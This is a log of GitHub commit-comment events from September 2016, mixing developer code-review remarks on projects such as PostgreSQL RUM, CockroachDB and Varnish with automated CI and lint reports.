{"id":"4521673440","type":"CommitCommentEvent","actor":{"login":"jingmian"},"repo":{"name":"jingmian/rbac"},"payload":{"comment":{"id":18911872,"position":42,"line":666,"path":"shop.txt","commit_id":"7bae559d137db2d791579b6a39ba5acddf5897e4","created_at":"2016-09-06T14:31:03Z","updated_at":"2016-09-06T14:31:03Z","body":"全路径\r\n如果是顶级权限,全路径等于本记录主键值\r\n如果不是顶级权限,全路径等于\"父级全路径-(中恒线)本记录主键值\""}},"created_at":"2016-09-06T14:31:03Z"}
{"id":"4521677023","type":"CommitCommentEvent","actor":{"login":"select-artur"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911876,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T14:31:35Z","updated_at":"2016-09-06T14:31:35Z","body":"It is a limitation of the current implementation of the partial match in RUM. Because **TIDBitmap** is used to store item pointers of tuples, which starts with 'andre:*'. **TIDBitmap** needed to exclude duplicated item pointers and to sort them. Otherwise queries will be too slow, slower than sequential scan. Disadvantage of **TIDBitmap** is that you can't store additional information (like timestamp) in it.\r\n\r\nFor example, you can test the query:\r\n```sql\r\n> SET enable_seqscan = off;\r\n> select sent, subject from pglist order by sent '2000-01-01' :: TIMESTAMP limit 10;\r\n```\r\nIt is slower than sequential scan. Because here we dont use **TIDBitmap**. We use usual array with item pointers and additional information and with all duplicates."}},"created_at":"2016-09-06T14:31:35Z"}
{"id":"4521678662","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18911879,"position":null,"line":null,"path":null,"commit_id":"3cb2f1120e2dd03260562b1363287b70e35dd622","created_at":"2016-09-06T14:31:51Z","updated_at":"2016-09-06T14:31:51Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/412/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T14:31:51Z"}
{"id":"4521679004","type":"CommitCommentEvent","actor":{"login":"jingmian"},"repo":{"name":"jingmian/rbac"},"payload":{"comment":{"id":18911881,"position":43,"line":667,"path":"shop.txt","commit_id":"7bae559d137db2d791579b6a39ba5acddf5897e4","created_at":"2016-09-06T14:31:54Z","updated_at":"2016-09-06T14:31:54Z","body":"基本:0顶级权限  1次顶级权限  2次次顶级\r\n权限程序缩进关系使用"}},"created_at":"2016-09-06T14:31:54Z"}
{"id":"4521681052","type":"CommitCommentEvent","actor":{"login":"KonstantinDavidov"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18911885,"position":22,"line":553,"path":"Projects/FireMonitor/Modules/SKDModule/Employees/ViewModels/EmployeeDetails/EmployeeDetailsViewModel.cs","commit_id":"bbaa7aadbe651e4ae232ea01afe8cd92e5857531","created_at":"2016-09-06T14:32:16Z","updated_at":"2016-09-06T14:32:16Z","body":"Если присвоение **SelectedDepartment** нужно в обоих случаях выполнять, то вынесение операции присваивания за условие будет выглядеть примерно так:\r\n\r\n```\r\nif (DialogService.ShowModalWindow(departmentSelectionViewModel) &&departmentSelectionViewModel.SelectedDepartment != null)\r\n{\r\n//.......\r\n}\r\n\r\nSelectedDepartment = departmentSelectionViewModel.SelectedDepartment == null ? null : departmentSelectionViewModel.SelectedDepartment.Department\r\n```\r\n"}},"created_at":"2016-09-06T14:32:16Z"}
{"id":"4521681809","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911887,"position":25,"line":539,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"2a703a41330a2da7c65eb578a926cf855926cff0","created_at":"2016-09-06T14:32:23Z","updated_at":"2016-09-06T14:32:23Z","body":"Should we probably use the singular here and in the following text of this section? Since it's now the only resource in here ;)"}},"created_at":"2016-09-06T14:32:23Z"}
{"id":"4521682664","type":"CommitCommentEvent","actor":{"login":"core23"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18911890,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-06T14:32:30Z","updated_at":"2016-09-06T14:32:30Z","body":"I know it's a big pain right now, but @XWB is doing great work right now and I hope we can expect a final version soon 👍 \r\n\r\nYou should never use a master version of any repository, instead you could reply on the latest alpha release, also it is very old."}},"created_at":"2016-09-06T14:32:30Z"}
{"id":"4521684739","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":18911897,"position":null,"line":null,"path":null,"commit_id":"18b88fe5d8efceb5a1954a90a20d64d6beeee943","created_at":"2016-09-06T14:32:50Z","updated_at":"2016-09-06T14:32:50Z","body":"@didrix Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/43/violations\n```\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/scaling.py:192:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/scaling.py:380:1: C901 'ImageScaling.scale' is too complex (14)\nplone/namedfile/scaling.py:421:9: B901 blind except: statement\nplone/namedfile/scaling.py:425:80: E501 line too long (80 > 79 characters)\nplone/namedfile/scaling.py:426:5: E125 continuation line with same indent as next logical line\nplone/namedfile/scaling.py:465:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:466:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:467:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:469:41: Q000 Remove bad quotes.\nplone/namedfile/utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils.py:89:65: Q000 Remove bad quotes.\nplone/namedfile/utils.py:89:80: E501 line too long (85 > 79 characters)\nplone/namedfile/utils.py:98:65: Q000 Remove bad quotes.\nplone/namedfile/utils.py:98:80: E501 line too long (85 > 79 characters)\nplone/namedfile/utils.py:107:65: Q000 Remove bad quotes.\nplone/namedfile/utils.py:107:80: E501 line too long (85 > 79 characters)\nplone/namedfile/utils.py:115:13: E122 continuation line missing indentation or outdented\nplone/namedfile/utils.py:119:13: E122 continuation line missing indentation or outdented\nplone/namedfile/tests/test_scaling.py:138:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:140:80: E501 line too long (83 > 79 characters)\nplone/namedfile/tests/test_scaling.py:263:13: E128 continuation line under-indented for visual indent\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-06T14:32:50Z"}
{"id":"4521689678","type":"CommitCommentEvent","actor":{"login":"sorcamarian"},"repo":{"name":"sorcamarian/angularfire2-instalation-webpack-fixed-errors"},"payload":{"comment":{"id":18911906,"position":null,"line":null,"path":null,"commit_id":"b625b4067f9802a78e73d7da3a8dd8fa2d369eb6","created_at":"2016-09-06T14:33:37Z","updated_at":"2016-09-06T14:33:37Z","body":"With pleasure.  :D\r\n\r\nMany people have contributed: https://github.com/angular/angularfire2/issues/461"}},"created_at":"2016-09-06T14:33:37Z"}
{"id":"4521693134","type":"CommitCommentEvent","actor":{"login":"f3flight"},"repo":{"name":"adobdin/timmy"},"payload":{"comment":{"id":18911914,"position":null,"line":null,"path":null,"commit_id":"19e4fec8fd579616e9171a8dc32920fbda7a32ef","created_at":"2016-09-06T14:34:12Z","updated_at":"2016-09-06T14:34:12Z","body":"https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123\r\nyay"}},"created_at":"2016-09-06T14:34:12Z"}
{"id":"4521693167","type":"CommitCommentEvent","actor":{"login":"select-artur"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911915,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T14:34:12Z","updated_at":"2016-09-06T14:34:12Z","body":"So to fix this we need a storage wich allows store unique item pointers with additional information without so much overhead."}},"created_at":"2016-09-06T14:34:12Z"}
{"id":"4521693688","type":"CommitCommentEvent","actor":{"login":"geoffharcourt"},"repo":{"name":"bmorrall/dotfiles"},"payload":{"comment":{"id":18911916,"position":null,"line":null,"path":null,"commit_id":"9ebfaf088ccedb7949cb25137a707ba6f561a211","created_at":"2016-09-06T14:34:17Z","updated_at":"2016-09-06T14:34:17Z","body":"Glad it helped. FYI, the initial idea here came from @TheLonelyGhost."}},"created_at":"2016-09-06T14:34:17Z"}
{"id":"4521701120","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18911932,"position":null,"line":null,"path":null,"commit_id":"4a7ef490cbd4221ff8dc95158075586dbd23f574","created_at":"2016-09-06T14:35:27Z","updated_at":"2016-09-06T14:35:27Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/413/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1969)."}},"created_at":"2016-09-06T14:35:27Z"}
{"id":"4521703302","type":"CommitCommentEvent","actor":{"login":"andreak"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911937,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T14:35:45Z","updated_at":"2016-09-06T14:35:45Z","body":"Thanks for answering.\r\n\r\nWhat kind of storage are we talking about, stuff internal to the RUM-extension, or are we talking about the need for pluggable storage in PG?"}},"created_at":"2016-09-06T14:35:45Z"}
{"id":"4521703677","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18911938,"position":54,"line":1770,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:35:49Z","updated_at":"2016-09-06T14:35:49Z","body":"`err` isn't a string, so I need `%v`. The others I copied from the old code."}},"created_at":"2016-09-06T14:35:49Z"}
{"id":"4521704083","type":"CommitCommentEvent","actor":{"login":"dicbrus"},"repo":{"name":"chymz/ng2-select"},"payload":{"comment":{"id":18911940,"position":null,"line":null,"path":null,"commit_id":"e35184a12e91a1f74676c6af0de7f24e470de37d","created_at":"2016-09-06T14:35:53Z","updated_at":"2016-09-06T14:35:53Z","body":"it is not RC6 compatible :-1: \r\n\r\nFor example, 'directives' were removed from @Component, but they present in this rep. "}},"created_at":"2016-09-06T14:35:53Z"}
{"id":"4521704770","type":"CommitCommentEvent","actor":{"login":"chuan6"},"repo":{"name":"chuan6/structured-law-document"},"payload":{"comment":{"id":18911942,"position":3,"line":2,"path":"generator/resources/婚姻法.txt","commit_id":"98a3f4f1027d8cd0cfcea849b78a50507f394842","created_at":"2016-09-06T14:35:58Z","updated_at":"2016-09-06T14:35:58Z","body":"尚不能自动处理的特例。"}},"created_at":"2016-09-06T14:35:58Z"}
{"id":"4521706103","type":"CommitCommentEvent","actor":{"login":"chuan6"},"repo":{"name":"chuan6/structured-law-document"},"payload":{"comment":{"id":18911944,"position":7,"line":21,"path":"generator/resources/网络借贷信息中介机构业务活动管理暂行办法.txt","commit_id":"98a3f4f1027d8cd0cfcea849b78a50507f394842","created_at":"2016-09-06T14:36:13Z","updated_at":"2016-09-06T14:36:13Z","body":"尚不能自动处理的特例。"}},"created_at":"2016-09-06T14:36:13Z"}
{"id":"4521706780","type":"CommitCommentEvent","actor":{"login":"be-cloud-js"},"repo":{"name":"be-cloud-be/odoo-modules"},"payload":{"comment":{"id":18911948,"position":null,"line":null,"path":null,"commit_id":"d5241646cdd6e32fce76767eb9bf1c71a9002084","created_at":"2016-09-06T14:36:19Z","updated_at":"2016-09-06T14:36:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;c1H8KWow&#x2F;80-ajouter-une-option-sur-le-programme-pour-le-rendre-non-deliberable\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Ajouter une option sur le programme pour le rendre non-délibérable.</a>"}},"created_at":"2016-09-06T14:36:19Z"}
{"id":"4521714120","type":"CommitCommentEvent","actor":{"login":"Marie201212"},"repo":{"name":"Marie201212/HELLO-FIRST"},"payload":{"comment":{"id":18911960,"position":null,"line":null,"path":null,"commit_id":"0a450c45a328df891fa580876ad472047b36ea07","created_at":"2016-09-06T14:37:26Z","updated_at":"2016-09-06T14:37:26Z","body":"JUST FOR TRY"}},"created_at":"2016-09-06T14:37:26Z"}
{"id":"4521715547","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911967,"position":19,"line":1004,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"f85ce1caa10cd0574cce217c3176596776c43385","created_at":"2016-09-06T14:37:40Z","updated_at":"2016-09-06T14:37:40Z","body":"It no longer activates logical volumes, since we are now directly using the drbd device."}},"created_at":"2016-09-06T14:37:40Z"}
{"id":"4521717538","type":"CommitCommentEvent","actor":{"login":"pauloddr"},"repo":{"name":"pauloddr/rails-angular-material-admin"},"payload":{"comment":{"id":18911971,"position":8,"line":11,"path":"app/assets/javascripts/rails_angular_material_admin/services/api_service.js","commit_id":"72e4cadd03e84e2735ca5396a7f2048e88b6c487","created_at":"2016-09-06T14:37:57Z","updated_at":"2016-09-06T14:37:57Z","body":"Serializer is no longer needed."}},"created_at":"2016-09-06T14:37:57Z"}
{"id":"4521718270","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18911973,"position":null,"line":null,"path":null,"commit_id":"3cb2f1120e2dd03260562b1363287b70e35dd622","created_at":"2016-09-06T14:38:05Z","updated_at":"2016-09-06T14:38:05Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/414/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T14:38:05Z"}
{"id":"4521722107","type":"CommitCommentEvent","actor":{"login":"ambaca"},"repo":{"name":"ambaca/insurgency_maps"},"payload":{"comment":{"id":18911979,"position":null,"line":null,"path":null,"commit_id":"d1551eb3201027f403619bb65074e044a20af86f","created_at":"2016-09-06T14:38:40Z","updated_at":"2016-09-06T14:38:40Z","body":"False decription. Old legacy workshop maps still not get collected in map list.\r\nBut new workshop maps will, workshop publish ID 490xxxxxx and above."}},"created_at":"2016-09-06T14:38:40Z"}
{"id":"4521723163","type":"CommitCommentEvent","actor":{"login":"Dridi"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18911985,"position":13,"line":87,"path":"lib/libvarnish/ws.c","commit_id":"37be38b348c672c8e61662824f2965f6343bb54a","created_at":"2016-09-06T14:38:50Z","updated_at":"2016-09-06T14:38:50Z","body":"Is `PAOK(space)` safe when space is NULL?"}},"created_at":"2016-09-06T14:38:50Z"}
{"id":"4521724167","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18911987,"position":78,"line":1794,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:39:00Z","updated_at":"2016-09-06T14:39:00Z","body":"Can GRPCDial really return an error and a connection in need of closing? Agree that I need to bail out of the lambda on errors."}},"created_at":"2016-09-06T14:39:00Z"}
{"id":"4521724833","type":"CommitCommentEvent","actor":{"login":"ValTM"},"repo":{"name":"ValTM/LGen"},"payload":{"comment":{"id":18911990,"position":444,"line":867,"path":"js/generator.js","commit_id":"f4f2fee3bc156839fcf06ceafa70455bdec48939","created_at":"2016-09-06T14:39:07Z","updated_at":"2016-09-06T14:39:07Z","body":"Whole method now uses requiredData for variables."}},"created_at":"2016-09-06T14:39:07Z"}
{"id":"4521725916","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911998,"position":27,"line":1009,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"f85ce1caa10cd0574cce217c3176596776c43385","created_at":"2016-09-06T14:39:18Z","updated_at":"2016-09-06T14:39:18Z","body":"It mounts the drbd device."}},"created_at":"2016-09-06T14:39:18Z"}
{"id":"4521726761","type":"CommitCommentEvent","actor":{"login":"piotrdrag"},"repo":{"name":"rbuj/review-translations"},"payload":{"comment":{"id":18912000,"position":null,"line":null,"path":null,"commit_id":"8223e447284ebdeb66da4fb89aaf4e050bd0d8d4","created_at":"2016-09-06T14:39:25Z","updated_at":"2016-09-06T14:39:25Z","body":"Thank you, but I don't think my patches are substantial enough to warrant a copyright to the project."}},"created_at":"2016-09-06T14:39:25Z"}
{"id":"4521728289","type":"CommitCommentEvent","actor":{"login":"pbillerot"},"repo":{"name":"pbillerot/memodoc"},"payload":{"comment":{"id":18912006,"position":null,"line":null,"path":null,"commit_id":"48cf5d71ac48a7fc549966ca99abfbb8bdd26845","created_at":"2016-09-06T14:39:38Z","updated_at":"2016-09-06T14:39:38Z","body":"C'est normal car il faudrait mettre l'URL du flux audio correspondant."}},"created_at":"2016-09-06T14:39:38Z"}
{"id":"4521729847","type":"CommitCommentEvent","actor":{"login":"ValTM"},"repo":{"name":"ValTM/LGen"},"payload":{"comment":{"id":18912013,"position":163,"line":346,"path":"js/generator.js","commit_id":"f4f2fee3bc156839fcf06ceafa70455bdec48939","created_at":"2016-09-06T14:39:53Z","updated_at":"2016-09-06T14:39:53Z","body":"Basically the whole method now uses requiredData to get variable values from, in preparation to move the drawing part out."}},"created_at":"2016-09-06T14:39:53Z"}
{"id":"4521731028","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18912015,"position":25,"line":539,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"2a703a41330a2da7c65eb578a926cf855926cff0","created_at":"2016-09-06T14:40:07Z","updated_at":"2016-09-06T14:40:07Z","body":"You are right! Good catch, thanks! :+1: Fixed."}},"created_at":"2016-09-06T14:40:07Z"}
{"id":"4521732671","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18912021,"position":null,"line":null,"path":null,"commit_id":"b69fb50645363d8d9a430b12d41f27995f3ee722","created_at":"2016-09-06T14:40:24Z","updated_at":"2016-09-06T14:40:24Z","body":"For auto-complete: https://github.com/rubyide/vscode-ruby#autocomplete"}},"created_at":"2016-09-06T14:40:24Z"}
{"id":"4521733536","type":"CommitCommentEvent","actor":{"login":"triple111"},"repo":{"name":"triple111/MUDscape"},"payload":{"comment":{"id":18912024,"position":null,"line":null,"path":null,"commit_id":"7e81e35ab3f5508479471fddd2677b27cb6cc0a1","created_at":"2016-09-06T14:40:31Z","updated_at":"2016-09-06T14:40:31Z","body":"Yeah not sure what this was"}},"created_at":"2016-09-06T14:40:31Z"}
{"id":"4521741460","type":"CommitCommentEvent","actor":{"login":"select-artur"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18912051,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T14:41:45Z","updated_at":"2016-09-06T14:41:45Z","body":"No, it isn't internal to the RUM. TIDBitmap is a PostgreSQL feature. It is also used in GIN. It is a structure specially adapted to store ItemPointers. If you're interested you can see **tidbitmap.c** and **tidbitmap.h** in PostgreSQL source code."}},"created_at":"2016-09-06T14:41:45Z"}
{"id":"4521742553","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18912053,"position":27,"line":1009,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"f85ce1caa10cd0574cce217c3176596776c43385","created_at":"2016-09-06T14:41:55Z","updated_at":"2016-09-06T14:41:55Z","body":"Fixed."}},"created_at":"2016-09-06T14:41:55Z"}
{"id":"4521742746","type":"CommitCommentEvent","actor":{"login":"vanElden"},"repo":{"name":"vshn/puppet-burp"},"payload":{"comment":{"id":18912054,"position":null,"line":null,"path":null,"commit_id":"89f1c424b227f6641dc432d368f04bbac2afe4e2","created_at":"2016-09-06T14:41:57Z","updated_at":"2016-09-06T14:41:57Z","body":"Probably the mode should be a server-config option as well?"}},"created_at":"2016-09-06T14:41:57Z"}
{"id":"4521743118","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18912056,"position":108,"line":1824,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:42:00Z","updated_at":"2016-09-06T14:42:00Z","body":"I copied that from the existing code."}},"created_at":"2016-09-06T14:42:00Z"}
{"id":"4521746017","type":"CommitCommentEvent","actor":{"login":"madhav6"},"repo":{"name":"madhav6/Hello--world"},"payload":{"comment":{"id":18912062,"position":null,"line":null,"path":null,"commit_id":"6fe0d905892df3fbad0c2c19fae487b0c8cfd309","created_at":"2016-09-06T14:42:30Z","updated_at":"2016-09-06T14:42:30Z","body":"info change"}},"created_at":"2016-09-06T14:42:30Z"}
{"id":"4521746151","type":"CommitCommentEvent","actor":{"login":"MaxLiv"},"repo":{"name":"MaxLiv/b_m"},"payload":{"comment":{"id":18912064,"position":null,"line":null,"path":null,"commit_id":"fba64ce8c8c61eb293ee2c6e76fe8939e7e90c33","created_at":"2016-09-06T14:42:31Z","updated_at":"2016-09-06T14:42:31Z","body":"first try"}},"created_at":"2016-09-06T14:42:31Z"}
{"id":"4521756315","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18912095,"position":19,"line":1004,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"f85ce1caa10cd0574cce217c3176596776c43385","created_at":"2016-09-06T14:44:08Z","updated_at":"2016-09-06T14:44:08Z","body":"Ok, I've removed this item and moved the second one with mounting into the para before the `<itemizedlist>` tag."}},"created_at":"2016-09-06T14:44:08Z"}
{"id":"4521761957","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18912104,"position":null,"line":null,"path":null,"commit_id":"e554fb955082e8869c29e79252ac3ed37a0020ab","created_at":"2016-09-06T14:44:57Z","updated_at":"2016-09-06T14:44:57Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/415/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T14:44:57Z"}
{"id":"4521763828","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18912110,"position":15,"line":174,"path":"storage/replica_trigger.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:45:18Z","updated_at":"2016-09-06T14:45:18Z","body":"Done."}},"created_at":"2016-09-06T14:45:18Z"}
{"id":"4521767235","type":"CommitCommentEvent","actor":{"login":"predator17"},"repo":{"name":"predatorlai/PROJECT_FILE_MANAGER"},"payload":{"comment":{"id":18912120,"position":null,"line":null,"path":null,"commit_id":"69d1449d83ec2b81f591ea7abb4d74e6328bfe12","created_at":"2016-09-06T14:45:49Z","updated_at":"2016-09-06T14:45:49Z","body":"the latest one on 6-sept"}},"created_at":"2016-09-06T14:45:49Z"}
{"id":"4521769153","type":"CommitCommentEvent","actor":{"login":"nigoroll"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18912127,"position":13,"line":87,"path":"lib/libvarnish/ws.c","commit_id":"37be38b348c672c8e61662824f2965f6343bb54a","created_at":"2016-09-06T14:46:10Z","updated_at":"2016-09-06T14:46:10Z","body":"safe as in will not trigger an assertion failure.\r\nwe probably should have an assert for non-NULL"}},"created_at":"2016-09-06T14:46:10Z"}
{"id":"4521774945","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18912142,"position":null,"line":null,"path":null,"commit_id":"f22cb2b488bd4a912b5be23d2ff1d47233fc8b63","created_at":"2016-09-06T14:47:03Z","updated_at":"2016-09-06T14:47:03Z","body":"++"}},"created_at":"2016-09-06T14:47:03Z"}
{"id":"4521777693","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18912148,"position":null,"line":null,"path":null,"commit_id":"e60d6f99f68fa49690737568c43e07d21a235b18","created_at":"2016-09-06T14:47:30Z","updated_at":"2016-09-06T14:47:30Z","body":"++"}},"created_at":"2016-09-06T14:47:30Z"}
{"id":"4521780671","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18912155,"position":null,"line":null,"path":null,"commit_id":"976d038cc458b6d7d0364587d5a169bfcea2a308","created_at":"2016-09-06T14:47:57Z","updated_at":"2016-09-06T14:47:57Z","body":"++"}},"created_at":"2016-09-06T14:47:57Z"}
{"id":"4521783871","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18912171,"position":24,"line":47,"path":"psi4/src/psi4/libfilesystem/path.cc","commit_id":"46e3f8a1efa2e503a650a9183365a400ecc1e569","created_at":"2016-09-06T14:48:28Z","updated_at":"2016-09-06T14:48:28Z","body":"Thanks, that clears up my first problem. Now, I think the `||` in the `errno` check should be an `&&`, and that'll fix up my remaining problem. Agree?"}},"created_at":"2016-09-06T14:48:28Z"}
{"id":"4521784374","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18912173,"position":null,"line":null,"path":null,"commit_id":"803752896b6143480de6e8bc21ea891446edac39","created_at":"2016-09-06T14:48:32Z","updated_at":"2016-09-06T14:48:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 926](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12702&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T14:48:32Z"}
{"id":"4521784785","type":"CommitCommentEvent","actor":{"login":"WouterG"},"repo":{"name":"SpleefLeague/Core"},"payload":{"comment":{"id":18912175,"position":null,"line":null,"path":null,"commit_id":"437dbc6acaf3b5e4f0ee1e167dc5b776543d7e95","created_at":"2016-09-06T14:48:36Z","updated_at":"2016-09-06T14:48:36Z","body":"I wouldn't want to debate which method is better, but this one fits our codebase better and probably also better in a spigot plugin."}},"created_at":"2016-09-06T14:48:36Z"}
{"id":"4521785488","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"inikep/lz4"},"payload":{"comment":{"id":18912176,"position":4,"line":714,"path":"lib/lz4frame.c","commit_id":"3eb143fffa0a557726658d8164e76239dea9245c","created_at":"2016-09-06T14:48:42Z","updated_at":"2016-09-06T14:48:42Z","body":"Looks clean and simple"}},"created_at":"2016-09-06T14:48:42Z"}
{"id":"4521786821","type":"CommitCommentEvent","actor":{"login":"joe935"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18912184,"position":null,"line":null,"path":null,"commit_id":"ee886aca0690a24401e037851c28a6e042b072e2","created_at":"2016-09-06T14:48:54Z","updated_at":"2016-09-06T14:48:54Z","body":"Since installing your Yahoo DLL, every time Pidgin is started, all messages since the install of Plugin, are back in each IM window, even though i have done a clear scrollback for each IM window.\r\nIs there another way to clear the messages so the are gone permanently ?\r\nThanks for the plugin."}},"created_at":"2016-09-06T14:48:54Z"}
{"id":"4521792193","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"pdep-utn/mumuki-guia-objetos-herencia"},"payload":{"comment":{"id":18912199,"position":3,"line":3,"path":"description.md","commit_id":"9a2657049758cacf022b94e8a98f0e5f1b702dd8","created_at":"2016-09-06T14:49:46Z","updated_at":"2016-09-06T14:49:46Z","body":"@gcrespi @JuanchiRios unos tips de estilo: \r\n\r\n1. No usen títulos dentro de los enunciados, porque colisionan con la jerarquía de títulos de la plataforma. Es decir, no utilicen `#`\r\n1. Sólo utilicen `>` para delimitar la consigna, usualmente al final. En la plataforma se va a ver como un recuadro azul. Para insertar comentarios \"colgados\", suelo utilizar simplemente cursivas. \r\n1. De la mano de lo primero, traten que la lectura del texto no esté interrumpida por subsecciones. Por ejemplo, para introducir el dominio, no utilicen un título sino algún giro, como \"Para demostrarlo, demos una mano el mundo del avatar.....\" o algo así  \r\n"}},"created_at":"2016-09-06T14:49:46Z"}
